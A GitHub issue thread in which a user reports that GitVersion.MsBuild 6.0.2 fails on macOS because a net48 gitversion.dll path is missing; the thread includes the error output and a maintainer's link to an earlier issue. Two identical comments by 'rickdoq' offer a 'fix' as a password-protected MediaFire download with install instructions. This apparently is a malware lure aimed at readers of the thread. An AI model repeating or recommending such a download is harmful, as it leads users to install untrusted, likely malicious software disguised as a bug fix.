### ISSUE TITLE
[ISSUE]: Fails with Net48 project

### ISSUE THREAD

**Issue by drewcassidy** [GitTools/GitVersion#4189]
### Prerequisites

- [X] I have written a descriptive issue title
- [X] I have searched [issues](https://github.com/GitTools/GitVersion/issues) to ensure it has not already been reported

### GitVersion package

GitVersion.MsBuild

### GitVersion version

6.0.2

### Operating system

macOS

### What are you seeing?

I attempted to add this to [my project](https://github.com/KSPModdingLibs/Shabby/tree/gitversion-bug), and when I try to build I get this error

```
dotnet --roll-forward Major "/Users/drewcassidy/.nuget/packages/gitversion.msbuild/6.0.2/tools/net48/gitversion.dll" "/Users/drewcassidy/Code/Shabby/Source"  -output file -outputfile "obj/gitversion.json"
Could not execute because the specified command or file was not found.
Possible reasons for this include:
  * You misspelled a built-in dotnet command.
  * You intended to execute a .NET program, but dotnet---roll-forward does not exist.
  * You intended to run a global tool, but a dotnet-prefixed executable with this name could not be found on the PATH.
```

I can confirm that dll path does not exist, but does exist for other dotnet versions

### What is expected?

Build succeeds

### Steps to Reproduce

Clone [this repo](https://github.com/KSPModdingLibs/Shabby/tree/gitversion-bug), attempt to build

### Output log or link to your CI build (if appropriate).

```shell
https://github.com/KSPModdingLibs/Shabby/actions/runs/10642923789/job/29505883955
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by arturcic** [comment]
https://github.com/GitTools/GitVersion/issues/2997
